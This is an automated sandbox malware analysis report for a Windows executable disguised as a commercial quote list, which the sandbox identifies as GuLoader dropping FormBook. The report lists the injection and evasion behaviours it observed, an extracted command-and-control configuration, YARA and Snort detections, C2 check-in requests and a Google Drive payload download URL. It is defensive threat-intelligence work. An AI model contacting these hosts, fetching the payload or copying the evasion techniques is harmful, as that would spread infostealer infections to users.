Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQINL0607_Commerical_list.exe

Overview

General Information

Sample Name:RFQINL0607_Commerical_list.exe
Analysis ID:1295687
MD5:eebe8af538e906f4f2422dfa7c448962
SHA1:61cb7d8c06bafc6bedb63bd27525fe15e8b6fc53
SHA256:3ab67edd421427d8e26c522fde52b72e0822fab92f3a4dae0b5305e2b908f15a
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • RFQINL0607_Commerical_list.exe (PID: 7244 cmdline: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe MD5: EEBE8AF538E906F4F2422DFA7C448962)
    • RFQINL0607_Commerical_list.exe (PID: 4284 cmdline: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe MD5: EEBE8AF538E906F4F2422DFA7C448962)
      • explorer.exe (PID: 5284 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • colorcpl.exe (PID: 5004 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • cmd.exe (PID: 912 cmdline: /c del "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ddh979.com/fg83/"], "decoy": ["ghostpreneur.store", "banksolutions.biz", "dcroofingservicesinc.com", "mtotem.online", "telefonino.shop", "bjbruq.com", "sanlimarket.com", "ssmreio.com", "soilcarbonservices.com", "itgandi.com", "23-services.com", "rtuakl.xyz", "shippedparck.hair", "aitechscope.com", "789v35top1dna.life", "visionaryglobalconsulting.com", "autosportsrepairs.com", "ecoproducefest.info", "ballbucketssalesstore.com", "81775557.com", "blueribbonwebsite.com", "zxwl.team", "ytqkqnfh.cfd", "dywhcm.com", "tmaingenieria.com", "pixlstocks.com", "seansgecko.com", "ryfusa.com", "luckymotherclucker.com", "pingpongtable-sg.bond", "r5fesgy.com", "gewep.cloud", "icegel-seat.shop", "risingmoonminerals.com", "skyleryang.top", "marine-sub.com", "7sdide.xyz", "vacaywhitefishguestrentals.com", "deyuming.icu", "listeningtip.com", "kmxbcx.xyz", "mindflow.dance", "shebyoaksmovie.com", "ladybugfiles.com", "oellcefn.cfd", "lido.systems", "thepinkerprint.com", "zentrimax.com", "cryptor.store", "sejaluzentreasmulheres.com", "car-deals-43222.bond", "qyhpoeqo.click", "wereadqueerbooks.com", "aldonduke.com", "dabaogou.com", "hashx.online", "sfaiqhwxebvtre.net", "nrodwukb.click", "solarpoweredawnings.com", "browcosmeticsnurse.com", "crispwhites.com", "ngbjf.cyou", "thedevilsin.com", "cbd-docteurenherbe.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 23 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.2085.10.194.22849932802031412 08/23/23-09:30:44.545161
      SID:2031412
      Source Port:49932
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2031.31.198.6149942802031412 08/23/23-09:34:09.129231
      SID:2031412
      Source Port:49942
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20150.95.255.3849944802031412 08/23/23-09:35:30.833388
      SID:2031412
      Source Port:49944
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20198.54.117.21249928802031412 08/23/23-09:29:42.718305
      SID:2031412
      Source Port:49928
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.205.111.16349943802031412 08/23/23-09:34:50.183718
      SID:2031412
      Source Port:49943
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2043.154.67.17049936802031412 08/23/23-09:31:25.801441
      SID:2031412
      Source Port:49936
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2092.205.50.7349947802031412 08/23/23-09:36:32.743918
      SID:2031412
      Source Port:49947
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2091.195.240.12349948802031412 08/23/23-09:36:52.935537
      SID:2031412
      Source Port:49948
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9149938802031412 08/23/23-09:32:47.291633
      SID:2031412
      Source Port:49938
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20188.114.97.349937802031412 08/23/23-09:32:26.954532
      SID:2031412
      Source Port:49937
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2076.223.26.9649939802031412 08/23/23-09:33:28.092219
      SID:2031412
      Source Port:49939
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20104.21.6.5749931802031412 08/23/23-09:30:23.778246
      SID:2031412
      Source Port:49931
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2034.102.136.18049933802031412 08/23/23-09:31:04.844971
      SID:2031412
      Source Port:49933
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2018.225.33.21049946802031412 08/23/23-09:36:12.408484
      SID:2031412
      Source Port:49946
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20203.161.56.23749945802031412 08/23/23-09:35:51.426849
      SID:2031412
      Source Port:49945
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ddh979.com/fg83/"], "decoy": ["ghostpreneur.store", "banksolutions.biz", "dcroofingservicesinc.com", "mtotem.online", "telefonino.shop", "bjbruq.com", "sanlimarket.com", "ssmreio.com", "soilcarbonservices.com", "itgandi.com", "23-services.com", "rtuakl.xyz", "shippedparck.hair", "aitechscope.com", "789v35top1dna.life", "visionaryglobalconsulting.com", "autosportsrepairs.com", "ecoproducefest.info", "ballbucketssalesstore.com", "81775557.com", "blueribbonwebsite.com", "zxwl.team", "ytqkqnfh.cfd", "dywhcm.com", "tmaingenieria.com", "pixlstocks.com", "seansgecko.com", "ryfusa.com", "luckymotherclucker.com", "pingpongtable-sg.bond", "r5fesgy.com", "gewep.cloud", "icegel-seat.shop", "risingmoonminerals.com", "skyleryang.top", "marine-sub.com", "7sdide.xyz", "vacaywhitefishguestrentals.com", "deyuming.icu", "listeningtip.com", "kmxbcx.xyz", "mindflow.dance", "shebyoaksmovie.com", "ladybugfiles.com", "oellcefn.cfd", "lido.systems", "thepinkerprint.com", "zentrimax.com", "cryptor.store", "sejaluzentreasmulheres.com", "car-deals-43222.bond", "qyhpoeqo.click", "wereadqueerbooks.com", "aldonduke.com", "dabaogou.com", "hashx.online", "sfaiqhwxebvtre.net", "nrodwukb.click", "solarpoweredawnings.com", "browcosmeticsnurse.com", "crispwhites.com", "ngbjf.cyou", "thedevilsin.com", "cbd-docteurenherbe.com"]}
      Multi AV Scanner detection for submitted file
      Source: RFQINL0607_Commerical_list.exeVirustotal: Detection: 21%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://www.7sdide.xyz/fg83/www.ballbucketssalesstore.comAvira URL Cloud: Label: phishing
      Source: http://www.telefonino.shop/fg83/Avira URL Cloud: Label: malware
      Source: http://www.rtuakl.xyz/fg83/www.shebyoaksmovie.comAvira URL Cloud: Label: phishing
      Source: http://www.rtuakl.xyz/fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnsceAvira URL Cloud: Label: phishing
      Source: http://www.7sdide.xyzAvira URL Cloud: Label: phishing
      Source: http://www.rtuakl.xyz/fg83/www.r5fesgy.comAvira URL Cloud: Label: phishing
      Source: http://www.telefonino.shop/fg83/www.zentrimax.comAvira URL Cloud: Label: malware
      Source: http://www.7sdide.xyz/fg83/Avira URL Cloud: Label: phishing
      Source: http://www.telefonino.shopAvira URL Cloud: Label: malware
      Source: http://www.telefonino.shop/fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYoAvira URL Cloud: Label: malware
      Source: RFQINL0607_Commerical_list.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49922 version: TLS 1.2
      Source: RFQINL0607_Commerical_list.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11591199372.0000000033141000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11593834689.0000000000110000.00000040.10000000.00040000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620803992.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259139024.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11591199372.0000000033141000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11593834689.0000000000110000.00000040.10000000.00040000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620803992.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259139024.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: wntdll.pdbUGP source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11505723007.0000000033179000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11499237617.0000000032FC5000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000044ED000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11592658015.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11597611230.0000000004218000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RFQINL0607_Commerical_list.exe, RFQINL0607_Commerical_list.exe, 00000002.00000003.11505723007.0000000033179000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11499237617.0000000032FC5000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000044ED000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11592658015.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11597611230.0000000004218000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 18.225.33.210 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.205.111.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 31.31.198.61 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 92.205.50.73 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.6.57 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 203.161.56.237 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 85.10.194.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 76.223.26.96 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49928 -> 198.54.117.212:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49931 -> 104.21.6.57:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49932 -> 85.10.194.228:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49933 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49936 -> 43.154.67.170:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49937 -> 188.114.97.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49938 -> 185.53.179.91:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49939 -> 76.223.26.96:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49942 -> 31.31.198.61:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49943 -> 154.205.111.163:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49944 -> 150.95.255.38:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49945 -> 203.161.56.237:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49946 -> 18.225.33.210:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49947 -> 92.205.50.73:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49948 -> 91.195.240.123:80
      Performs DNS queries to domains with low reputation
      Source: DNS query: www.7sdide.xyz
      Source: DNS query: www.kmxbcx.xyz
      Source: DNS query: www.rtuakl.xyz
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.ddh979.com/fg83/
      Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=h0bAtoVykYa/rrFkLV94YI4T4if6JB47wwwQdxj8azu213gVVwhSCjjiLgU+HyCgJrmv HTTP/1.1Host: www.aitechscope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYo HTTP/1.1Host: www.telefonino.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0X HTTP/1.1Host: www.zentrimax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=T6ZJsGSn7Xix6KaCNKUP+2dHlKNLLzmiVy8An9M+L4qtZR+McsZCzJePNx5gVfUlgzDb HTTP/1.1Host: www.luckymotherclucker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=SC/iCgFLVXNGeXCdvfSQQa0Pnk4CAUJ5O5Rqv1EukQPQaC7CZmx4daunLr1tFIMbtKb4&kxopsN=MlyXbd0X HTTP/1.1Host: www.nrodwukb.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1C HTTP/1.1Host: www.ballbucketssalesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X HTTP/1.1Host: www.pingpongtable-sg.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=+mA0FlUcSz8uL7OKJNWfW2ZlgbXAiWHV5u0VTdt0L7UZP0MWfugFcx8oc6pDvqcBHwu4&kxopsN=MlyXbd0X HTTP/1.1Host: www.shebyoaksmovie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=2RBP+VTnP5UsVlIy/ct1u57VujAPMLUq2SsmZdBI0t1ol65Yzj5vyA1Q7mc2+tYrW7QO&kxopsN=MlyXbd0X HTTP/1.1Host: www.mtotem.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=DQc+x29LPs0StMrMYSOxbo606Q5N7aX/d2tywja8NeaCrvmLZ/vuxhKObAknVg63SjuP&kxopsN=MlyXbd0X HTTP/1.1Host: www.ddh979.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=93iuEoE3ZAJchREJoff4c3+cnuBG7egDZRy7rY1Y8CjSiruBWemx2Azc3Gt8OJFb+t3B&1b_Pr=C88x5r HTTP/1.1Host: www.sfaiqhwxebvtre.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnsce HTTP/1.1Host: www.rtuakl.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=Mrfpj9Lscj+lGsorq1+NGtecW7+GotfegZgYdt6juanfgo0fmIEP17Z154I/86DF7ZrT&1b_Pr=C88x5r HTTP/1.1Host: www.r5fesgy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?1b_Pr=C88x5r&IpZXsVy=o9iJiepY7tbZK5GL3oPLoe4ACswWoGUScwmdQvzUuUD/DHdXMl0ph81Qbo3YWeK2S1M+ HTTP/1.1Host: www.lido.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=AfWx5BM5NEDLLjiDiXzoNqwgCc8LDH2xQfiELIIrQmIg7de8Ug2fD1PTSOtTZsGWy/y0&1b_Pr=C88x5r HTTP/1.1Host: www.ngbjf.cyouConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 185.53.179.91 185.53.179.91
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4ulvss7tcohtsfs7v3penv9eff/1692775725000/09097082265029608041/*/1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79?e=download&uuid=29b6be65-76dc-43bd-aef7-44538726e87d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-14-bk-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
